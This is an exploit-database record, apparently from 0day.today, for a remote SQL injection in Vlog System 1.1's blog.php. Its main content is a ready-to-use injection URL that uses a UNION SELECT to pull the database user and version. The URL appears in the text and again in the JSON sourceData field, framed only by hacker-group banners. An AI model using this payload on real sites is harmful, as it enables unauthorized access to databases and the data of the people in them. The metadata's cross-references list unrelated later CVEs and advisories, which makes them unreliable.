ID 1337DAY-ID-4224
Type zdt
Reporter Mr.SQL
Modified 2008-11-22T00:00:00
Description
Exploit for unknown platform in category web applications
==================================================================
Vlog System 1.1 (blog.php user) Remote SQL Injection Vulnerability
==================================================================
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Vlog System V1.1 ( blog.php user )
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## SYRIAN Arab HACkErS
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/blog.php?user=<< REAL USER NAME HERE >>¬e=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--
##
########################
########################
#######################################################################################################
#######################################################################################################
# 0day.today [2018-02-06] #
{"id": "1337DAY-ID-4224", "lastseen": "2018-02-06T07:06:53", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2018-02-06T07:06:53", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704598", "OPENVAS:1361412562310892042", "OPENVAS:1361412562310877396", "OPENVAS:1361412562310112678", "OPENVAS:1361412562310112679", "OPENVAS:1361412562310844280"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2042.NASL", "FEDORA_2020-ADB4F0143A.NASL", "UBUNTU_USN-4224-1.NASL", "DEBIAN_DSA-4598.NASL"]}, {"type": "github", "idList": ["GHSA-VFQ6-HQ5R-27R6"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2042-1:1ECD8", "DEBIAN:DSA-4598-1:1AECD"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BB50854212A3A7F0D1400AD8F267AB83"]}, {"type": "zdt", "idList": ["1337DAY-ID-33747"]}, {"type": "exploitdb", "idList": ["EDB-ID:47879"]}, {"type": "ubuntu", "idList": ["USN-4224-1"]}, {"type": "cve", "idList": ["CVE-2019-19844"]}, {"type": "symantec", "idList": ["SMNTC-111255"]}, {"type": "mskb", "idList": ["KB4462199"]}], "modified": "2018-02-06T07:06:53", "rev": 2}, "vulnersScore": 5.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/4224", "description": "Exploit for unknown platform in category web applications", "title": "Vlog System 1.1 (blog.php user) Remote SQL Injection Vulnerability", "cvelist": [], "sourceData": "==================================================================\r\nVlog System 1.1 (blog.php user) Remote SQL Injection Vulnerability\r\n==================================================================\r\n\r\n\r\n###############################################################\r\n#################### Viva IslaM Viva IslaM ####################\r\n##\r\n## Remote SQL injection Vulnerability\r\n##\r\n## Vlog System V1.1 ( blog.php user )\r\n## \r\n###############################################################\r\n###############################################################\r\n##\r\n## AuTh0r : Mr.SQL\r\n##\r\n## SYRIAN Arab HACkErS\r\n########################\r\n########################\r\n##\r\n## -[[: Exploite :]]-\r\n##\r\n## www.Target.com/blog.php?user=<< REAL USER NAME HERE >>¬e=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--\r\n##\r\n########################\r\n########################\r\n\r\n#######################################################################################################\r\n#######################################################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "published": "2008-11-22T00:00:00", "references": [], "reporter": "Mr.SQL", "modified": "2008-11-22T00:00:00", "href": "https://0day.today/exploit/description/4224", "immutableFields": []}
{}
